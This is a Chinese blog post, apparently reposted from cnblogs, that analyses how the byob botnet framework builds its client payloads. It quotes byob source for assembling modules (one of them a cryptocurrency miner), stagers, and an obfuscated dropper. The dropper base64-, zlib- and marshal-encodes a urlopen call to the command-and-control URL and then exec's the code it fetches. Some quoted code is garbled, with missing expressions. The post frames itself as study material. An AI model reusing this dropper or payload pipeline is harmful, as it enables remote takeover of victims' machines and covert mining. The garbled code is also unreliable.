【byob】 payload 生成过程
提示[*]个人博客首页
[*]免责声明:仅供学习交流使用!开源框架可能存在的风险和相关后果将完全由用户自行承担,本人不承担任何法律责任。
1. byob web 介绍
1.1 平台主要组件
1.1.1 fask
1.1.2 SQLAlchemy
1.1.3 threading
1.1.4 socket
1.1.5 ***
1.2 攻击过程python 文件为例
1.2.1 生成过程 (route("/api/payload/generate")
1.2.1.1 client.main(**kwargs)
[*]models: 构建 client payload 的主要模块
modules = ['modules/util.py','core/security.py','core/payloads.py', 'core/miner.py']
# util.py 许多模块使用的杂项实用函数
# security.py 提供加密,膜拜,后续再慢慢分析 之前一直用的 pycryptomode
# payloads.py 提供 payloads 的socket 连接
# miner.py 矿工脚本
[*]imports: 构建 client payload 的主要模块中的导入非本地库
for x in ['core'] + for i in os.listdir('core')] + ['core.%s' % s for s in for i in os.listdir('core')]]:
if x in line:
break
else:
imports.add(line.strip())
# imports 返回获取 modules 中的 import packets(排除 byob 本地文件包)
[*]hidden:获取 moduls imports 中主要的 packets
for line in kwargs['imports']:
if len(line.split()) > 1:
for i in str().join(line.split()).split(';').split(','):
i = line.split() if i == '*' else i
hidden.add(i)
# hidden 排除 imports 中的 'import' 字符
[*]payloads: 主要的功能函数
loader= open('core/loader.py','r').read()#, generators.loader(host=C2_HOST, port=int(C2_PORT)+2, packages=list(kwargs['hidden']))))
# 加载 core/loader.py
test_imports = '\n'.join(['import ' + i for i in list(kwargs['hidden']) if i not in ['StringIO','_winreg','pycryptonight','pyrx','ctypes']])
# 导入 packets
potential_imports = '''
try:
import pycryptonight
import pyrx
except ImportError: pass
'''
# 可能导入的 packets
modules = '\n'.join(( for module in kwargs['modules']] + ))
# 读取 modules 数组内的文件名称,并截取 # main 后的数据
# 加上 generators.main() 构造的 main template
# 最后拼接 _payload.run()
payload = '\n'.join((loader, test_imports, potential_imports, modules))
# 将上述数据拼接成 payload
[*]stagers: 获取独特的payload
if options.encrypt:
stager = open('core/stagers.py', 'r').read() + generators.main('run', url=kwargs['url'], key=kwargs['key'])
else:
stager = open('core/stagers.py', 'r').read() + generators.main('run', url=kwargs['url'])
# 获取 core/stagers.py
# 并拼接_run(url)
[*]dropper: 获取 stagers
dropper = """import sys,zlib,base64,marshal,json,urllib
if sys.version_info > 2:
from urllib import request
urlopen = urllib.request.urlopen if sys.version_info > 2 else urllib.urlopen
exec(eval(marshal.loads(zlib.decompress(base64.b64decode({})))))""".format(repr(base64.b64encode(zlib.compress(marshal.dumps("urlopen({}).read()".format(repr(kwargs['url'])),2)))))
# 生成 dropper参考资料
[*]github
[*]byob
[*]csdn
[*]语雀
交个朋友
[*]github learnselfs
来源:https://www.cnblogs.com/nones/p/17073865.html
免责声明:由于采集信息均来自互联网,如果侵犯了您的权益,请联系我们【E-Mail:cb@itdo.tech】 我们会及时删除侵权内容,谢谢合作!
页:
[1]